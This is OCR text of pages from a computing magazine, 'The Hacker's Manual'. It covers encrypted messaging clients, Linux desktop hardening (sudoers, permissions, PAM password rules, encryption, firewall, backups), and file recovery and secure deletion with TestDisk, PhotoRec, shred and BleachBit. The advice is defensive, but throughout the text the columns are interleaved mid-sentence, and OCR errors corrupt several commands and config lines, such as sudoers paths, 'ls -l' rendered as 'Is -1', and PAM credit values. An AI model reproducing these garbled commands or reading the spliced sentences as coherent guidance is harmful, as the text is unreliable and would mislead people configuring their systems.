Web: https://retroshare.github.io Licence GNU GPL Version 0.6.2 Web: http://goldbug.sourceforge.net Licence GNU GPL Version 3.5
» A solid platform for communication with a slight learning curve. >1 Overshadowed by a cluttered UI and poorly translated documentation.

qTox ★★★ Over to you...


Web: https://qtoxgithub.io icence: GNU GPLv3 Version: 1.11.0 Would you be willing to move yourself and your friends and family
» A -winner if it weren’t for the inconsistent behaviour of the video calls. over to a secure IM? We're all ears at lxf.letters@futurenet.com.

Also consider...
Having secure conversations over the insecure can use to encrypt your chats, for example systems, but if you need a secure app for
open internet is a growing concern for Pidgin is one such mainstream client that mobile-to-mobile communication, check out
corporations and individuals alike. This is why comes with OTR as an optional plugin. ChatSecure. Signal and SureSpot. They are all
in addition to the open source clients we’ve There's also Wickr which allows users to open source and available for both Android
covered in this Roundup, there are a wide array exchange end-to-end encrypted messages and and iOS devices. While ChatSecure only allows
of proprietary clients on offer as well. There's a enables them to set an expiration time on the text-based OTR encryption over XMPP, you
strong possibility that your current IM client communication. The application is available for can use Signal and SureSpot to make audio
enables you to add the OTR plugin, which you all major mobile and desktop operating and video calls as well. ■

The Hacker's Manual | 63


Security

Linux: Secure
your desktop
Linux can thwart a majority of attacks on its own but we can help put a level
10 forcefield around your computer.
unning Linux just because you think it's safer than you decided to disable a service on which they rely. For

R Windows? Think again. Security in Linux is a built-in


feature and extends right from the kernel to the

about with your /home folder. Sure, Linux is impervious to


example, many server applications rely on databases, so
before you turn off MySQL or PostgreSQLyou should make
sure you aren't running any applications that rely on them.
desktop, but it still leaves enough room to let someone muck

viruses and worms written for Windows, but attackers have Secure user accounts
several other tricks up their sleeves to illegally access your On a multiuser system like Linux, it's imperative that you limit
precious bits and bytes that make up everything from your access to the superuser root account. Most distributions
personal emails to your credit card details. these days don't allow you to login as root at boot time, which
Locking your data behind a username and password is good. Furthermore, instead of giving multiple people root
shouldn't be your only line of defence and isn't enough to permission, you should grant root access on a per-command
hold off a determined attacker. As the number, nature and basis with the sudo command. Using sudo instead of logging
variety of computer attacks escalate every day, you too in as the root user has several advantages. All actions
should go out of the way and take ext'a measures to secure performed with sudo are logged in the /var/log/secure file,
your computer against unauthorised access. which also records all failed attempts.
All mainstream Linux distributions such as Debian, One of the major advantage of using sudo is that it allows
Ubuntu, and Fedora have security teams that work with the you to restrict root access to certain commands. For this you
package teams to make sure you stay on top of any security need to make changes in the /etc/sudoers file which should
vulnerabilities. Generally these teams work with each other to always be edited with the visudo command. The visudo
make sure that security patches are available as soon as a command locks the sudoers file, saves edits to a temporary
vulnerability is discovered. Your distribution will have a file, and ensure the configuration is correct before writing it to
repository solely dedicated to security updates. All you have /etc/sudoers. The default editor for visudo is vi.
to do is make sure the security-specific repository is enabled To allow a user named admin to gain full root privileges
(chances are it will be, by default), and choose whether you'd when they precedes a command with sudo, add the following
like to install the updates automatically or manually at the line in the /etc/sudoers file:
press of a button. For example, from the Updates tab in the admin ALL=(ALL) ALL
Software & Updates app, you can ask Ubuntu to download To allow a user named joe to run all commands as any
and install security updates automatically. user but only on the machine whose hostname is viperhost:
In addition to the updates, distributions also have a joe viperhost=(ALL) ALL
security mailing list to announce vulnerabilities, and also You can also restrict access to certain commands. For
share packages to fix them. It's generally a good idea to example, the following line will only allow user called susie to
keep an eye on the security list for your distro, and look out run the kill, shutdown, halt and reboot commands:
for any security updates to packages that are critical to you. susie ALL = /binAdll, /sbin/shutdown, /sbin/halt, /sbin/
There's a small lag between the announcement and the reboot
package being pushed to the repository; the security mailing Similarly, user called jack can only add and remove users:
lists guide the impatient on how to grab and install the jack ALL = /usr/sbin/adduser
updates manually. You can also restrict a user’s scope. The following allows
You should also take some time to disable unnecessary the user named nate to kill unresponsive processes, but only
services. A Linux desktop distro starts a number of services on his workstation named tango and not anywhere else:
to be of use to as many people as possible. But you really nate tango = KILL
don't need all these services. Samba, for example, shouldn't On a related note, you should also set expiration dates for
really be enabled on a secure server, and why would you accounts used by non-permanent users. This can include any
need the Bluetooth service to connect to Bluetooth devices interns, temporary employees and consultants who need to
on a computer that doesn’t have a Bluetooth adapter? All access your Linux installation. Ideally you should immediately
distributions let you control the services that run on your deactivate and remove the temporary accounts as soon as
Linux installation usually with an built in graphical utility. they aren’t needed. The expiration date acts as a safeguard to
However some applications might stop functioning because ensure these accounts can’t be misused.

64 | The Hacker's Manual


Secure your desktop

NoScript Security Suite 2.9)0.14


O NoScript Options .137,9031

General Whitetist Embeddings Appearance Notifications Advanced

C Temporarily allow top-level sites by default


Full Addresses (http://www.noscript.net)

Full Domains (www.noscript.net )

Base 2nd level Domains (noscript.net)

Prevent browser­ Q Open permissions menu when mouse hovers over NoScript\'s icon
based breaches with the Left clicking on NoScript toolbar button toggles permissions for current top-level site
NoScript and BetterPrivacy (ctrl+shift+BACK SLASH)
extensions that prevent Full Addresses (http://www.noscript.net)
your web browser from Full Domains (www.noscript.net )
running malicious scripts. • Base 2nd level Domains (noscript.net)
Q Automatically reload affected pages when permissions change

Reload the current tab only

Allow sites opened through bookmarks

Donate Import Export Reset Cancel

Use the usermodcommand to tweak a user's account and You can view the permissions of a file or directory with the
set an expiration date, such as: Is -1 command. The command to use when modifying
$ sudo usermod -e 2017-01-02 bodhi permissions is chmod. There are two ways to modify
In this example, the user named bodhi will not be able to permissions, with numbers or with letters. Using letters is From a security
point of view, it's
log into the account from January 2.2017. easier to understand for most people, but numbers are much
prudent to stick
better once you get used to them. Table 1 (over the page) lists to the official
Permissions primer the chmod values for each of the permission types. repositories as
Another important part of securing your Linux system is For example, chmod u+x somefile gives execute much as possible,
setting proper permissions. In Linux and Unix, everything is a permissions to the owner of the file. The chmod 744 somefile and only look
elsewhere as a
file. Directories are files, files are files and devices are files. does the same thing but is expressed in numbers. Similarly,
last resort.
Every file and program must be owned by a user. Each user chmod g+wx somefile adds write and execute permission to
has a unique identifier called a user ID (UID), and each user the group while chmod 764 somefile is how you'll express it
must also belong to at least one group, which is defined as a with numbers.
collection of users that has been established by the system However, this arrangement can't be used to define per­
administrator and can be assigned to files, folders and more. user or per-group permissions. For that, you need to employ
Users may belong to multiple groups. Like users, groups access control lists (ACL) that enable you to specify elaborate
also have unique identifiers, called group IDs (GIDs). The permissions for multiple users and groups. While you can
accessibility of a file or program is based on its UIDs and define them manually, graphical tools such as E/c/e/make the
GIDs. Users can access only what they own or have been process more intuitive and help you save a lot of time and
given permission to run. Permission is granted because the effort. You can install E/c/e/from the repos of most major
user either belongs to the file's group or because the file is desktop distributions. Once installed, the tool can be used to
accessible to all users. The one exception is the root or fine-tune the access permissions for each individual file.
superuser who is allowed to access all files and programs in To get a better hang of the filesystem permissions on
the system. Also, files in Linux have three kinds of permission Linux, let's put them into practise to lock sensitive files such
associated to them - users, groups and others - that as the ones that house password information. The file should
determine whether a user can read, write or execute a file. belong to the root owner and group with 644 permissions.

Keep an eye on processes


Virtually all malicious activity happens via the available resources on your process you can use the kill command
processes running in the background. As computer. If you want a more user- followed by the PID (Process ID) of the
part of your active security management friendly version of the running processes, unrecognised program.
plan, you should keep an eye on the install the htop utility from the repos. For example, kill -9 1934 will ask the
running processes on your machine and Every process is assigned a process ID. Linux kernel to shutdown the app
immediately take action against any or PID which helps identify and keep associated with the specified PID. You
suspicious processes. You can use the track of ind vidual processes. Use the can also kill a process from within the top
top command to list all the running pgrep command to list the PID if a utility. Press the k key and type the PID of
processes and how they are consuming process, such as pgrep vic .To kill a the process to terminate.

The Hacker's Manual | 65


Security
> Eiciel adds an pam.d directory. Here you'll find a configuration file for
Access Control virtually all the apps that request PAM authentication. When
List tab in the you look inside these configuration files, you'll notice that
file manager's they all begin with calls to include other configuration files
file properties
with the common- prefix. For example, the /etc/pam.d/
dialog window
passwd file calls the common-password file. These common-
that’s accessed
prefixed files are general configuration files whose rules
by right-clicking
over a file.
should be applied in most situations.
The common-password file among other things control
password complexity. The cat /etc/pam.d/common-password
I grep password command will list the relevant lines that
define the basic rule for passwords, such as:
password [success=l default=ignore] pam_unix.so
obscure sha512
This allows users to log in and view the associated username. password requisite pam_deny.so
It'll however prevent them from modifying the /etc/passwd password required pam_permit.so
file directly. Then there's the /etc/shadow file which contains password optional pam_gnome_keyring.so
encrypted password as well as other information such as We're interested in the first line which defines the rules for
account or password expiration values. The owner of this file password. Some rules are already defined such as asking for
is the user root while the group is often set to an passwords to be encrypted with SHA512 algorithm. The
administrative group, like shadow. The permissions on this file obscure parameter ensures complexity based on various
are set to 000 to prevent any user from even reading the file. factors such as previous passwords, number of different
Still, while there is no access permission on the file, the types of characters and more.
root user can still access it. But if no one can access the file For more password checking capabilities, let’s install an
how can users change their passwords which are stored in additional PAM module with sudo apt install libpam-cracklib
this file? This is because the /usr/bin/passwd utility uses . Installing this module will automatically change the /etc/
the special permission known as SUID. Thanks to this special pam.d/common-password file which lists the additional line:
provision, the user running the passwdcommand temporarily password requisite pam_cracklib.so retry=3 minlen=8
To use nano as the becomes root while the command is running and can then difok=3
visudo editor for
write to the /etc/shadow file. Similarly, the /etc/group file This line enables the pam_cracklib module and gives the
the current shell
session, set and which contains all the groups on the system and should have users three chances to pick a good password. It also sets the
export the EDITOR the same file permissions as the /etc/passwd file. In the minimum number of characters in the password to 8. The
variable before same vein, the group password file, /etc/gshadow should difok=3 option sets the minimum number of characters that
calling visudo,
have the same permissions as that of the /etc/shadow file. must be different from the previous password.
such as
You can append remember-5 on this line to prevent users
EDITOR=nano
visudo .
Manage passwords with PAM from setting the five most recently used passwords. You can
The Pluggable Authentication Modules (PAM) mechanism also use the dcredit, ucredit, Icredit and ocredit options to
was originally implemented in the Solaris operating system force the password tc include digits, upper-case characters,
but has been a Linux mainstay for quite a while now. PAM lower-case characters and special-case characters. For
simplifies the authentication management process and example, you can use the following to force the user to
provides a flexible mechanism for authenticating users and choose a password that’s not the same as the username and
apps. In order to reap the benefits of PAM, individual contains a minimum of 10 characters with atleast 4 digits, 1
> Always ensure
your distribution applications have to be written with support for the PAM upper-case character, and 1 special character:
is configured library. The command Idd /{,usr/}{bin,sbin}/’ I grep -B 5 password requisite pam_cracklib.so dcredit=-4
to install libpam I grep <A/’ will display a list of all the apps on your ucredit=-l ocredit=-l lcredit=O minlen=10 reject_username
security updates system that are PAM-aware in some way or the other. From
immediately the list you'll notice that many of the common Linux utilities Obfuscate your partition
without waiting make use of PAM. One of the best ways to keep your personal data to yourself is
for manual
You can also use PAM to force users to select a complex to encrypt it, so others cannot read the files. To this end, the
confirmation.
password. PAM stores its configuration files under the /etc/ installers of some leading distributions, such as Fedora, Linux
Mint and Ubuntu, enable you to encrypt your entire disk
during the initial set up of the distro.
If you wish to encrypt individual files, however, you can use
the zuluCrypt application. What this does is block device
encryption, which means that it encrypts everything written
to a particular block device. The block device in question can
be a whole disk, a partition or even a file mounted as a
loopback device. With block device encryption, the user
creates the filesystem on the block device, and the encryption
layer transparently encrypts the data before writing it to the
actual lower block device.
Using zuluCrypt, you can create an encrypted disk within
a file or within a non-system partition or USB disk. It can also
encrypt individual files with GPG. ZuluCrypt has an intuitive
user interface: you can use it to create random keyfiles and

66 | The Hacker's Manual


Secure your desktop

A plan for disaster recovery


A plan for recovering from a breach that results
in data loss should be part of your security plan
as well. There are several versatile backup
util ties available for the Linux desktop user. In
fact, your distribution will surely have one
installed by default as well. Ubuntu, for example,
ships with the simple to use De/a Duptool which
you can also install on other distributions such
as Fedora. OpenSUSE and Linux Mint. Most of
the built-in backup tools, such as Deja Dup. have
a very minimal interface, but you’ll need to
configure them before putting them into action.
Almost every application will ask you to point it
to the location where you want to house your
backups. Depending on the tool you're using,
this can be a local hard disk, a remote location
accessible via SSH or FTP. or a web-based
storage service, such as Amazon S3. You'll also
> Deja Dup is based on Duplicity and provides just the right number of features for
have to mark files and directories that you want
desktop users who aren’t used to the ways of a backup tool.
to include in the backup. Some tools will also
help you setup a backup schedule to automate on a location for storing the backed up data. If appropriate backup methodology. Do you want
the process. Tools, such as Deja Dup. will also you have multiple disks and a spare computer to backup manually or automatically based on a
enable you to encrypt your backups. you can even setup your own Network Attached schedule? The correct backup frequency varies
While tools such as Deja Dup take the pain Storage (aka a NAS) device using software like based on the kind and value of data being
out of setting up the actual data backup OpenMediaVault. The kind of data you wish to safeguarded. Depending on the size of the files,
process, a crucial part of the process is backup also influences the choice of storage it might not be a good idea to back them up
preparing for it. For starters you need to decide medium. You'll also need to work out the completely everyday either.

use these to encrypt the containers. The app also includes will allow traffic without asking any questions. The Deny
the zuluMount tool that can mount all encrypted volumes option will silently discard all incoming or outgoing packets.
supported by zuluCrypt. The Reject option is different in that it sends an error packet
To install zuluCrypt head to http://mhogomchungu. to the sender of the incoming packets.
github.io/zuluCrypt/ and scroll down the page to the binary After you've set the policy for both Incoming and Outgoing Use the change
packages section. The app is available as installable .deb traffic you can define specific rules for individual apps and command
package files for Debian and Ubuntu. Download the package services. To create a rule, click the Add button after expanding (change -1
bodhi) to get
for your distro and extract it with tar xf zuluCrypt*.tar.xz . the Rules section. This opens a window that offers three tabs
various details
Inside the extracted folder, switch to the folder corresponding that enable the creation of rules in different ways. The
about a user's
to your architecture (i386 for older 32-Bit machines and Preconfigured option lets you select ready made rules for account, including
amd64 for new 64-Bit ones). Both folders contain four binary specific apps or services, while the other two enable you to the account expiry
packages that you can install in one go with the sudo dpkg -i define rules for specific ports. date and time
since the password
‘deb command. On other distributions you'll have to install We'd suggest that most users should stick to the
last changed.
zuluCrypt manually. Download the app’s tarball and follow the Preconfigured tab. All you need to do is select the app you
detailed steps in the included BUILD-INSTRUCTIONS file to wish to control traffic for from the drop-down menu and the
fetch the dependencies from your distro's repos. app will automatically define the most effective rules. As
mentioned earlier: for a secure system, you should drop all
Put up a Firewall incoming and outgoing traffic and then selectively add rules
Linux distributions comes with the venerable netfliter/ for the apps and services that you use. such as the web
iptables framework. This framework is a set of kernel browser, instant messaging and BitTorrent etc. ■
modules that can be utilised to create packet filtering rules at
the kernel level. Ubuntu ships with an application called Table 1. Access and user restrictions
Uncomplicated FireWall(UFW) which is a userspace
Permission Action chmod option
application that can be used to create iptables rules. There is
also a GUI for UFW called Gufw. Gufwtakes the pain out of read (view) ror4
managing iptables. The program can easily allow or block
write (edit) wor2
services as well as user-specified ports. You configure
your policy based on pre-installed profiles for Home, Public execute (execute) xorl
and Office and set the policies for incoming and outgoing
traffic. The default configuration should satisfy most of the
User Is -1 output chmod option
users, you can set individual rules if you wish for a more
advanced configuration. owner -rwx...... u
Begin by first enabling the firewall. Once enabled you can —. rwx—
group g
set the Incoming and Outgoing policies by selecting one of
other ...... -rwx 0
the three options in the drop-down menus. The allow option

The Hacker's Manual | 67


Security

Data recovery and


secure deletion
Mike Bedford investigates recovering files from damaged disks and
how to make sure that what you delete is gone for good.

ncreasingly, one of the most valuable commodities is

I information. But this isn’t just for big business -


most of us have data that is valuable in one way
or another. So, preserving that data is
important, because the consequences
of failing to do so can range from

https://commons.wikimedia.0rg/wiki/Fi1le:SanDtsk_
inconvenience to financial hardship.
And as we’re all well aware, there can
[expert

CREDIT: TDm itry Nosachev, CC BY-SA 4.0.


also be severe consequences if our data falls

Fij$ion_ioMemory_PX600-5200_PCI-
Mike Bedford into the wrong hands. Here we address the two
has been the victim
inter-related themes of data recovery following
of a disk crash, so
is all too aware of accidental deletion or hard disk failure, and secure
deletion so that, when you do delete data, nobody else > SSDs look different from
the anguish of losing
important data. magnetic hard disks and the
can recover it. Mostly we're considering traditional
challenges they pose for file
magnetic hard disks, but we also look at the different
recovery and secure deletion
challenges that apply to SSDs (see Solid-State Drives
are markedly different, too.
boxout below).

Check your bin! the trivially simple method of recovering the file won’t
Sometimes the obvious gets overlooked: that obvious work. If the file was deleted in the file manager - as will
measure is to restore the file from the Rubbish Bin almost certainly be the case with your non-technically
(Trash if the language is set to American English), the minded friend - there’s a good chance it’s residing in
special folder that stores files that have been deleted. the Rubbish Bin. Certainly, that is what happens if you
Do bear it in mind. After all, magically restoring your select a file and hit the Delete key, although Shift*
friend’s files might just promote you to hero status. If Delete bypasses the Rubbish Bin. It’s also possible,
you deleted a file using the rm (remove) command in permissions depending, to delete a file or send it to the
the terminal, that file will have been genuinely deleted, Rubbish Bin by selecting the appropriate option having
as opposed to being dispatched to the Rubbish Bin, so right-clicked on a file.

Solid-State Drives
Most of the techniques discussed an SSD can’t just be overwritten. First it has Then there’s wear levelling. Because
throughout this article don’t apply to SSDs, to be erased, which is a function of the flash memory can’t be written to as many
and both recovering deleted files and secure memory chips, and is not the same as times as magnetic memory -1,000 to
deletion are either impossible, unnecessary overwriting with zeros, for example. This 100,000 times, depending on the tech - the
or they are significantly more difficult takes time, so the SSD erases unused space SSD moves blocks of data around, as a
because of several things that happen, as a background process, so that writing background process, to avoid any blocks of
internal to the SSD, that the PC is totally new files isn’t slowed down unnecessarily. It memory' being over-used. Although the
unaware of. probably won’t happen immediately, but SSD’s firmware keeps track of this, it doesn’t
The first concerns what happens when a when the data is eventually erased, there’s provide the PC with this information. So,
file is deleted, and it relates to how the no possibility of recovering the file. That’s even if parts of a deleted file haven’t yet
space it occupied will eventually be reused. the bad news; the good news is that secure been erased, file recovery software won’t
Unlike a magnetic disk, the flash memory in deletion isn’t necessary. know where, the remnants of the file are.

68 | The Hacker’s Manual


Data recovery and secure deletion
So how do you recover 'permanently' deleted files?
A Terminal
We put that word in quotes because, although it’s often
frestDlsk 7.1, Data Recovery Utility, July 2619
thought of as such, files can still often be recovered.
khristophe GRENIER <grenier@cgsecurtty.org>
That's because, when a file is deleted, the data it https://www.cgsecurity.org
1 * FAT16 >32M 0 1 1 995 7 32 254944 [NO NAME]
contained isn’t actually deleted - in the sense of it
plrectory /
being overwritten with zeros or ones - but, instead, Previous 1
-rwxr-xr-x 0 0 5566 13-Aug-2022 17:23 LP10.txt
the reference to the file in the filesystem is marked as 0 0 0
drwxr-xr-x 29-Jul-2022 10:49 .Trash-1000
deleted, with the result that the space it occupied on -rwxr-xr-x 0 0 19530 3-Aug-2022 16:09 Relay Osclllator.cdr
-rwxr-xr-x 0 0 31090 3-Aug-2022 16:53 Light Chaser.cdr
the disk becomes available for reuse. Sounds like -rwxr-xr-x 0 0 1230 12-Aug-2022 09:35 C0B0L2N0J0B.TXT
deleted files ought to be recoverable, therefore, and -rwxr-xr-x 0 0 4091 12-Aug-2022 10:39 COBOL Compiler Output.txt
•rwxr-xr-x 0 0 1693 12-Aug-2022 12:53 COBOL-source-corrected by Br
while that is often true, some guidance is called for. -rwxr-xr-x 0 0 1788 12-Aug-2022 14:34 C0B0L3RDJ0B.TXT
Here we’re going to consider the worst case orwxr-xr x
drwxr-xr-x 0 0 0 14-Aug-2022 15:51 Latest Jobs
scenario of not noticing immediately that you’ve E
used the rm command inadvisably. If you do notice -rwxr-xr-x 0 0 53650 27-JUI-2022 17:46 CREGJ 119 Maios Interference]
Screenshot from 2022-09-23 1]
■rwxr-xr-x 0 0 102999 23-5ep-2022 09:37
immediately, though, other options might be available -rwxr-xr-x 0 0 73077 23-Sep-2022 12:45 Screenshot from 2022-09-23 1]
Next
to you if the file is still open in some application. We’re
Use Right to change directory, h to hide deleted files
going to be looking at some tools that enable you to q to quit, : to select the current file, a to select all files
C to copy the selected files, c to copy the current file
recover deleted files, but first we have some important
advice. Remember that deleting a file makes the space
is on recovering deleted files, because that’s surely > TestDisk
it occupied available for reuse. If your disk is large
doesn't work with
enough, and has enough free space, it’s quite possible the most commonly needed data recovery function,
the ext3 or ext4
that the data in your deleted file will remain untouched TestDisk's capabilities go far beyond that. So, if you
filesystems but,
for a considerable time, but there are no guarantees, find yourself in the unenviable but, hopefully, unlikely
as the red files
so avoid saving files to disk. This includes installing position of having accidentally deleted a disk partition, listed here prove,
new software, of course, so do make sure you have TestDisk can probably come to the rescue here, too. it works on FAT
the necessary tools for undeletion installed on your PC But there’s a snag if you want to restore a deleted devices such as
before you need them, although several such tools are file from a disk with the ext4 filesystem, which is USB flash drives.
pre-installed on some distros. Remember also that the one you’ll find used in most Linux systems, or its
background processes can write to disk, so if you just predecessor ext3. Unlike many other filesystems, when
avoid saving files yourself, you might still lose any a file is deleted in ext4 or ext3, the pointer that shows
chance of recovery. The safest thing to do, therefore, is where the deleted file’s data started on the disk is
to close down your system as soon as you notice your deleted. This would make undeletion by the normal
error and then start it from a bootable CD or USB drive method impossible; indeed, the user documentation
to attempt recovery. Needless to say, this means you doesn’t list ext4 as one of its supported filesystems.
need to be prepared. You could do worse than using Bizarrely, we’ve seen several reports of people claiming
the Ultimate Boot CD (www.ultimatebootcd.com), to have used TestDisk to restore deleted data on an
which is available as a download in ISO format and, in ext4 or ext3 disk, but we remain sceptical, and our
addition to the operating system, has diagnostic and experience is that you can’t. However, we were able to
data recovery tools already installed. use it to restore deleted files from a USB flash drive,
First of all, we’ll take a look at TestDisk. It's pre­ and the same will be true of memory cards, because
installed with some distros, but not all, so check they use the supported FAT file system.
before you need it, and install it if necessary. It’s a We’re not going to give a blow-by-blow account of
command-line utility and, for best results, you should how to recover deleted files using TestDisk, but if you
use it with sudo access. Although our emphasis here get stuck, the user manual seems comprehensive. We
should point out that the interface is wordy, but we're
A Terminal Q confident you’ll soon get the hang of it.

PhotoRec 7.1, Data Recovery Utility, July 2019


The first few menus are fairly obvious, but when you
Christophe GRENIER <grenter@cgsecurtty,org> get to a screen with options starting with Analyse,
https://www.cgsecurlty.org
Advanced and Geometry, select Advanced. Then, on
PhotoRec will try to locate the following files the next screen, select your partition and choose the
Previous Some say that
[ ] Iso ISO List or Undelete option, if available. secure deletion
[ ] It Impulse Tracker You can now navigate through the folders in that can't be guaranteed
[ ] ttu ITunes
] jks Java Keystore partition. Any deleted files are shown in red and are to keep a file from
JPG picture! prying eyes with
[] jsonlz4 Mozilla bookmarks
candidates for recovery. Do remember, though, for the
the ext4 filesystem
[] kdb KeePassX same reason that you need to avoid writing to your
[] kdbx KeePassX
because, like all
[] key Synology AES key disk as soon as you notice an accidental deletion, don’t journaling file
[] Idf Microsoft SQL Server Log Data File attempt to write your recovered files on to the same systems, there
[] lit Microsoft ITOL/ITLS
disk partition as the one that contained the lost files. might be a copy of
[] logic Apple Logic Studio
[] Ink MS Windows Link the file, or segments
Use a different partition or disk, perhaps a USB
] Iso Logic Platinum File of it, in the journal.
Tffiext memory stick, otherwise the first file you recover However, you
Press s for default selection, b to save the settings
might be your last. can take comfort
SKHSI from the fact that,
___________________________________ Return to main menu Because TestDisk won’t do the trick, we need to
by default, only
consider how to restore deleted files under ext4 or
PhotoRec uses a different approach from the likes of metadata is written
TestDisk for file recovery. However, be sure to only select the ext3. One option is extundelete. It works in a different
to the journal.
file types you’re interested in, otherwise it takes for ever. way from TestDisk, attempting to extract the

The Hacker’s Manual | 69


Security
necessary information from the filesystem’s journal, but
Terminal Q
we’re not going to concentrate on that here, because
there is arguably a better way, as you can see in the mike@Mtke-PC:~/Photos$ shred P6679921.jpg -uvz -n 16
shred: P6079921.jpg: pass 1/11 (random)..
Encrypting a file is a next section. shred: P6079921.jpg: pass 2/11 i(aaaaaa)..
viable alternative to shred: P6679921.jpg: pass 3/11 (492492)..
shred: P6079921.jpg: pass 4/11 (b6db6d)..
secure deletion and Beyond undeletion shred: P6679921.jpg: pass 5/11 I(666666)..
it gives you a'get shred: P6079921.jpg: pass 6/11 (random)..
TestDisk might be a powerful utility but, quite apart
out of jail free'card, shred: P6079921.jpg: pass 7/11 (555555)..
should you decide from its lack of support for ext4 and ext3, its ability to shred: P6079921.jpg: pass 8/11 ।(ffffff)..
shred: P6079921.jpg: pass 9/11 I(249249)..
you need it after all. undelete files on any supported filesystem relies on
shred: P6079921.jpg: pass 16/11 (random).
However, critics say that filesystem still being intact. If that isn’t the case - shred: P6079921.jpg: pass (000600).
it leaves you open to although we can take comfort from the fact that a
shred: P6079921.jpg: removing
shred: P6079921.jpg: renamed to 060666066660
being coerced into
corrupted filesystem is a rare occurrence - we need shred: 066660660666: renamed to 00606000060
revealing the key. shred: 00000060000: renamed to 0060060060
should you inhabit to employ some of the techniques used in digital shred: 6606006006: renamed to 666666600
some shady twilight forensics. The same techniques can also be used shred: 660666600: renamed to 00000000
shred: 00000066: renamed to 0006006
world, that is. with ext4 or ext3, even if TestDisk drew a blank. shred: 0060600: renamed to 000000
In these instances, instead of just reversing the shred: 000000: renamed to 00000
shred: 06606: renamed to 6666
deletion process, it’s necessary to search the disk shred: 6606: renamed to 606
for fragments of files and reassemble them using a shred: 006: renamed to 60
shred: 66: renamed to 6
detailed knowledge of the structure of particular file shred: P6679921.jpg:
___________ Jr„. removed
mtkegHtke-PC:-/Photos$ |
formats. Data recovery companies offer such a service,
but at a not-insignificant cost, so it’s fortunate that
> Shred makes your deleted files unrecoverable but,
there’s a companion program to TestDisk, which is depending on which flags you use, it makes a meal of it.
installed at the same time as it, called PhotoRec.
As the name suggests, its particular forte is photo
files such as JPEGs, but it actually supports over When PhotoRec has finished, the location you chose
480 different formats, including just about every for the recovered files will have been populated by
conceivable graphics format, movies, audio files and several folders with names starting with recup_dir, and
even LibreOffice documents and much more. It’s fairly each of these contains many recovered files. But
straightforward, so we’ll leave you to experiment with it, there’s a snag. PhotoRec can’t recover the names
but we do need to mention one important fact that of the files it restores. They all have meaningless
might get overlooked. filenames, so it won’t necessarily be easy to find the
One of the menus asks you to select a disk partition ones you need. If you view them in the file manager, of
to search but, having selected that, before moving on, course, depending on what option you select, you
be sure to highlight File Opt and press Enter. This should be able to find your files by scanning through
takes you to a menu that asks which file types you want the thumbnails. However, even this might be time­
it to search for and, by default, they're all selected. consuming, depending on how many files PhotoRec
Generally, you press S to deselect all the file types and recovered. And with TXT files, to give just one example,
then, having highlighted each type you’re interested in, you’re only going to discover your prize by opening
select it using the right arrow key. Because reducing them one at a time - possibly from a list of hundreds
the number of formats being searched for has massive or thousands - until you find the one you want.
speed benefits - in our tests, while searching for all file A corrupted filesystem might be a lot worse than an
types would have taken hours, this reduced it to 15 accidentally deleted file but, unfortunately, things can
minutes for JPEGs only - make sure you only choose get worse - a lot worse. If you’ve ever heard your hard
the types you’re interested in. disk making scratching sounds or continually clicking,

Big-Time Secure Deletion


Despite our look at secure deletion, and subjects the whole disk drive, working or shredder and you’ll get the picture. And the
coming to the conclusion that overwriting not, to a massively powerful magnetic pulse end result is little more than metallic
data multiple times isn’t really necessary, that instantaneously destroys any data on confetti. If that’s not for you, but you’re still
some organisations remain to be convinced the platter. Apart from the benefit of using concerned about disposing of an old PC, the
that any software solution could ever be an accredited service, this is so much photo might give you some inspiration.
adequate, and specialist companies are all quicker than wiping an entire disk by
too happy to pander to that concern. To be overwriting it with random data.
less condescending, we do admit that using If degaussing sounds like the ultimate
the services of an accredited data solution, wait until we move on to look at
destruction company might be necessary to disk destruction services. And we mean just
prove compliance with data protection that - totally and utterly destroying the disk.
legislation. The first method of data The Linux shred command shreds data in a
destruction, and the one that’s most similar conceptual way, but some secure deletion
to software-based overwriting, involves companies literally shred disks. Think
using a degausser. This is a machine that of a massive, industrial scale, document

70 | The Hacker’s Manual


Data recovery and secure deletion
while refusing to do anything useful, it’s a memory that opportunist criminals to the sole domain of the military
will stay with you for quite some time. This, of course, is and, perhaps, police involved in anti-terrorism. This
a disk crash. It might be that the head has come into begs the question of whether the technique is ever
contact with the platter - never a good thing, and used, if the stakes are large enough. Of course, we’ll If you want to safely
that’s an understatement - or perhaps the on-drive probably never know, but it’s interesting to note a dispose of a CD
electronics have failed. In either case, there’s little you conversation we had with a highly experienced or DVD, just snap
it in two. having
can do to resolve the situation (potentially you can specialist who worked for one of the major hard
first wrapped it in
source replacement board electronics from Ebay if disk manufacturers. The bottom line is that he was cloth to protect
that’s the issue) except call in the experts. It’s not going not aware of the technique ever having being used your eyes from
to be cheap, but many data recovery companies successfully. It’s probably a fair bet, therefore, that the shrapnel. Although
diagnose the problem for free, and you only pay a ‘meagre’ default three times that shred overwrites some document
shredderscan
recovery fee if that diagnosis suggests they’ll be able to your data won’t leave you with sleepless nights as you
handle optical disks,
revive your disk. ponder over the security of your deleted data. it wears them out
As a parting shot, we’ll introduce you to BleachBit, more quickly and is
Secure deletion (www.bleachbit.org) which is a GUI secure deletion totally unnecessary.
After all. trying to
We’ve seen that accidentally deleting a file doesn't package. With shred being so easy to use, you might
retrieve data from a
necessarily mean game over, but there’s a corollary to wonder what the point is of going to an all-singing, all­ broken disk would
this. If you deliberately delete a file, should your PC or dancing GUI tool, and the answer is that it does a lot be hugely expensive
media fall into the wrong hands, or if you have to share more than just shred files. Most fundamentally, it and only partially
your PC with other people, the same methods could securely deletes specified files, and it does the same successful

be used by that third party to resurrect your deleted with folders, although interestingly, in the light of our
data. Probably of more concern is being able to safely previous discussion, it overwrites data with just a single
dispose of an old PC. If the content of any deleted files pass, favouring speed over unnecessary multiple
is sensitive, therefore, you’ll want to take every means passes. As a major step beyond shred, BleachBit also
possible to ensure that it can’t be recovered. overwrites all unused space on your disk. This means
We started this article with the obvious, and the that it can securely delete files that have already been
subject of the Rubbish Bin is equally relevant here. deleted, something that shred can’t do. Bear in mind,
If you want to make sure your deleted files stay that though, that this isn’t a quick process. In addition,
way, don’t just transfer them to the Rubbish Bin. As BleachBit offers the option of removing a whole load of
we know, that alone isn’t enough to prevent them from files that you haven’t specifically written yourself - for
making a comeback, and this brings us to the subject of example, temporary files or browsing history, which
secure deletion. Deleting a file ordinarily doesn't delete might contain sensitive information. You can, of course,
it, but secure deletion utilities do exactly that delete this sort off data elsewhere - for example,
> BleachBit
by overwriting the entire contents of that file with other you can delete browsing history in the browser - but
offers secure
data. Using the command shred in place of rm BleachBit offers a couple of advantages. First, it’s a
deletion of files,
overwrites the file, and if you use the -u flag, it deletes one-stop shop ,so you can manage all your temporary
overwriting
it afterwards. By default, it overwrites the file three file deletion requirements from a single place. And,
of unused disk
